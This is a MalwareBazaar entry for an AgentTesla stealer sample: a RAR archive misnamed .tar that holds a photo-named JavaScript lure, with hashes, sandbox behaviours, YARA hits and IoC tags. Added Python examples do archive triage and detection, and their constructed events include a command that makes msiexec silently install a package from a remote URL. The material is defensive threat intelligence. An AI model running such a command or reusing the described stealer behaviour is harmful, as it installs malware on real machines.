MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 6c2025959b77c3958ef1f80b06a633edc649631b3d96536df1efa0f7b85cee2c. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry

AgentTesla

Vendor detections: 10

SHA256 hash: 6c2025959b77c3958ef1f80b06a633edc649631b3d96536df1efa0f7b85cee2c
SHA3-384 hash: 9ab6caa6a1e958ef34efbbe10b7c2ea460ee09b3dc50dd5c574d01b15e3d2d9a67764fdeb2900e8227a4002696173338
SHA1 hash: 68a39f9cfcb49fece31b9534d08d8bd26687937a
MD5 hash: e0e3123c0047ed145b6743b40c80603c
humanhash: fish-west-illinois-kansas
File name: 6c2025959b77c3958ef1f80b06a633edc649631b3d96536df1efa0f7b85cee2c.tar
Signature: AgentTesla
File size: 10'827 bytes
First seen: 2026-04-15 09:56:24 UTC
Last seen: Never
File type: tar (note: the content-based identifiers below, MIME type, TrID and Magika, all classify the file as a RAR archive, not tar; do not trust the .tar extension when choosing an extraction tool)
MIME type: application/x-rar
ssdeep: 192:1jYJz/CoNeKqy9RdOMqtfpRkCzAk8pU6GJkhZTWs6hcMJHDWX:to/CoNefy9eMqtfpeCsNhuy96y
TLSH: T1B422BF89730707E3C6535539AD0A19D05C99833E78D17FB6ED7642A0D377B360CEAA48
TrID: 61.5% (.RAR) RAR compressed archive (v5.0) (8000/1); 38.4% (.RAR) RAR compressed archive (gen) (5000/1)
Magika: rar
Reporter: JAMESWT_WT
Tags: 172-245-95-9 AgentTesla tar tecnoruoteindustriali-it

Intelligence


File Origin
# of uploads: 1
# of downloads: 79
Origin country: IT
File Archive Information

This file archive contains 1 file(s), sorted by their relevance:

File name: IMG20260415-02271.js (a .js script carrying a camera-photo-style name)
File size: 23'216 bytes
SHA256 hash: 3a9019bc4d0b77313357a86ef0045b19ae35fd6eabe7f9a24eca7fe49bc6a2b5
MD5 hash: eebdc958c0bcd9003bec0b9432713928
MIME type: text/plain
Signature: AgentTesla
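Two facts in this entry are worth turning into repeatable triage checks: the archive's declared type and its content disagree (a .tar file name over a RAR 5 container, per MIME type, TrID and Magika), and its only member is a script named like a camera photo. The Python below is an added example, not MalwareBazaar's own code. The byte strings are constructed headers rather than the real sample, and the member list is passed in as an argument because listing a RAR needs an external tool (for instance the rarfile module over unrar); the format map, script-extension set and lure-name pattern are the author's choices, not values from this page.

```python
"""Checks an archive sample's declared type against its content and looks for
script members disguised as photos or documents. Added example, not
MalwareBazaar's code; the byte strings and member names below are constructed
to resemble this entry (a .tar name over a RAR 5 container holding a .js
named like a camera photo), not taken from the real sample."""
import re
from pathlib import PurePosixPath
from typing import List, Optional

# (format, magic bytes, offset). RAR 5 and RAR 4 share a six-byte prefix and
# differ at byte 6, so both are listed explicitly.
MAGIC = [
    ("rar", b"Rar!\x1a\x07\x01\x00", 0),   # RAR 5.x
    ("rar", b"Rar!\x1a\x07\x00", 0),       # RAR 1.5 - 4.x
    ("zip", b"PK\x03\x04", 0),
    ("gzip", b"\x1f\x8b", 0),
    ("tar", b"ustar", 257),                # POSIX/GNU tar header magic
]
EXT_FORMAT = {".tar": "tar", ".rar": "rar", ".zip": "zip", ".gz": "gzip", ".tgz": "gzip"}
SCRIPT_EXTS = {".js", ".jse", ".vbs", ".vbe", ".wsf", ".wsh", ".hta", ".ps1", ".bat", ".cmd"}
# Names that imitate camera photos or business documents (assumed lure pattern).
LURE_STEM = re.compile(r"^(?:img|dsc|dcim|photo|scan|doc|invoice|order|payment)[-_ ]?\d{3,}", re.I)


def sniff_format(data: bytes) -> Optional[str]:
    """Identify the container format from magic bytes alone, ignoring the name."""
    for fmt, magic, off in MAGIC:
        if data[off:off + len(magic)] == magic:
            return fmt
    return None


def triage(name: str, data: bytes, members: List[str]) -> List[str]:
    """Return findings for an archive given its name, raw bytes and member names.

    Member names are supplied by the caller; for a real RAR they would come from
    something like rarfile.RarFile(path).namelist(). The checks are tool-agnostic.
    """
    findings = []
    claimed = EXT_FORMAT.get(PurePosixPath(name).suffix.lower())
    actual = sniff_format(data)
    if actual is None:
        findings.append("unrecognised container format")
    elif claimed != actual:
        findings.append(f"extension says {claimed or 'unknown'}, content is {actual}")
    for m in members:
        p = PurePosixPath(m)
        if p.suffix.lower() in SCRIPT_EXTS:
            findings.append(f"member {m}: script type {p.suffix.lower()}")
            if LURE_STEM.match(p.stem):
                findings.append(f"member {m}: photo/document-style lure name")
            if len(p.suffixes) > 1:
                findings.append(f"member {m}: double extension")
    return findings


# Constructed inputs: a RAR 5 signature padded with zeros, and a minimal tar
# header with the 'ustar' magic at offset 257. Neither is the real sample.
RAR5_BYTES = b"Rar!\x1a\x07\x01\x00" + b"\x00" * 24
TAR_BYTES = b"\x00" * 257 + b"ustar\x00" + b"00" + b"\x00" * 247

if __name__ == "__main__":
    for finding in triage("sample.tar", RAR5_BYTES, ["IMG20260415-02271.js"]):
        print(finding)
```

Run on the constructed RAR bytes under a .tar name with the member list from this entry, the script reports the format mismatch, the script-type member and the lure-style name; a genuine tar holding a text file produces no findings.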
Vendor Threat Intelligence

Verdict: Malicious
Threat level: 10/10
Confidence: 100%
Tags: fingerprint repaired

Verdict: Malicious
File type: rar
First seen: 2026-04-15T05:44:00Z UTC
Last seen: 2026-04-16T11:46:00Z UTC
Hits: ~10
Detections: Trojan.JS.SAgent.sb, UDS:DangerousObject.Multi.Generic, HEUR:Trojan.Script.Generic, HEUR:Trojan-Downloader.Script.Generic, HEUR:Trojan.Script.SAgent.gen

Threat name: Win32.Trojan.Qwexlafiba
Status: Malicious
First seen: 2026-04-15 07:39:55 UTC
File type: Binary (Archive)
Extracted files: 1
AV detection: 10 of 24 (41.67%)
Threat level: 5/5

Result
Malware family: agenttesla
Score: 10/10
Tags: family:agenttesla adware discovery execution keylogger persistence privilege_escalation spyware stealer trojan
Behaviour:
Modifies Internet Explorer settings
Modifies registry class
Suspicious behavior: AddClipboardFormatListener
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: MapViewOfSection
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Event Triggered Execution: Installer Packages
System Location Discovery: System Language Discovery
Command and Scripting Interpreter: JavaScript
Enumerates physical storage devices
Suspicious use of NtCreateThreadExHideFromDebugger
Suspicious use of NtSetInformationThreadHideFromDebugger
Enumerates connected drives
Looks up external IP address via web service
Checks computer location settings
Use of msiexec (install) with remote resource
Badlisted process makes network request
Family: AgentTesla
Please note that we are no longer able to provide a coverage score for VirusTotal.
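Two of the sandbox behaviours above, "Command and Scripting Interpreter: JavaScript" and "Use of msiexec (install) with remote resource", map directly onto process-creation telemetry. The Python below is an added example of that detection logic and is not part of MalwareBazaar or the vendor report. The events are constructed, Sysmon-style records (Image, ParentImage, CommandLine, ProcessId); their paths, process IDs and the TEST-NET address are made up and do not describe what this sample actually executes. The path and switch patterns are the author's assumptions about where a phishing attachment lands and how msiexec is invoked.

```python
"""Detection logic for two behaviours in the sandbox report above:
'Command and Scripting Interpreter: JavaScript' (T1059.007) and
'Use of msiexec (install) with remote resource' (T1218.007).
Added example, not part of MalwareBazaar or the vendor report; the events
are constructed Sysmon-style process-creation records with made-up values."""
import re
from typing import Dict, List, Tuple

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
SCRIPT_FILE = re.compile(r"\.(?:js|jse|vbs|vbe|wsf)\b", re.I)
# Where an extracted attachment normally lands (assumed user-writable paths).
USER_WRITABLE = re.compile(r"\\users\\[^\\]+\\(?:downloads|appdata|desktop)\\|\\temp\\", re.I)
# msiexec install/advertise/package switch followed by an http(s) URL.
MSIEXEC_REMOTE = re.compile(r"""[/-](?:i|package|a)\s+["']?https?://""", re.I)

Event = Dict[str, str]


def _base(path: str) -> str:
    """Lower-cased file name of an image path, tolerating either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect(events: List[Event]) -> List[Tuple[str, str]]:
    """Return (ProcessId, rule) pairs for events matching the two behaviours,
    plus the parent-child link between them (script host spawning msiexec)."""
    hits: List[Tuple[str, str]] = []
    for ev in events:
        image, parent, cmd = _base(ev["Image"]), _base(ev["ParentImage"]), ev["CommandLine"]
        if image in SCRIPT_HOSTS and SCRIPT_FILE.search(cmd) and USER_WRITABLE.search(cmd):
            hits.append((ev["ProcessId"], "T1059.007 script host executing a script from a user-writable path"))
        if image == "msiexec.exe":
            if MSIEXEC_REMOTE.search(cmd):
                hits.append((ev["ProcessId"], "T1218.007 msiexec installing a package from a remote URL"))
            if parent in SCRIPT_HOSTS:
                hits.append((ev["ProcessId"], "msiexec spawned by a script host"))
    return hits


# Constructed events: one benign script run, the lure script from Downloads,
# msiexec fetching a remote package as its child, and a benign local install.
EVENTS: List[Event] = [
    {"ProcessId": "3304", "Image": r"C:\Windows\System32\wscript.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Windows\System32\wscript.exe" "C:\Program Files\Vendor\maint.vbs"'},
    {"ProcessId": "4120", "Image": r"C:\Windows\System32\wscript.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Windows\System32\wscript.exe" "C:\Users\mario\Downloads\IMG20260415-02271.js"'},
    {"ProcessId": "4388", "Image": r"C:\Windows\System32\msiexec.exe",
     "ParentImage": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r"msiexec.exe /i http://198.51.100.7/upd.msi /qn"},
    {"ProcessId": "5012", "Image": r"C:\Windows\System32\msiexec.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'msiexec.exe /i "C:\Users\mario\Downloads\7zip.msi"'},
]

if __name__ == "__main__":
    for pid, rule in detect(EVENTS):
        print(pid, rule)
```

The benign script under Program Files and the local .msi install produce no hits; the Downloads-hosted .js and the msiexec child reaching for an http URL each fire, and the msiexec event additionally fires for having a script host as parent. Tightening the remote-URL pattern further (for example requiring /qn or /quiet) trades false positives for misses, so keep the parent-child rule as the second, independent signal.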

YARA Signatures


MalwareBazaar uses YARA rules from several public and non-public repositories, such as YARAhub and Malpedia. These are matched against malware samples uploaded to MalwareBazaar as well as against any suspicious process dumps they may create. Please note that only results from TLP:CLEAR rules are displayed.

Rule name: Guloader_Heuristic_VBS_A
Author: Ankit Anubhav - ankitanubhav.info
Description: Heuristic to detect 2023 Guloader variant
Rule name: Sus_CMD_Powershell_Usage
Author: XiAnzheng
Description: May contain (obfuscated or not) PowerShell or CMD command that can be abused by a threat actor (can create FP)
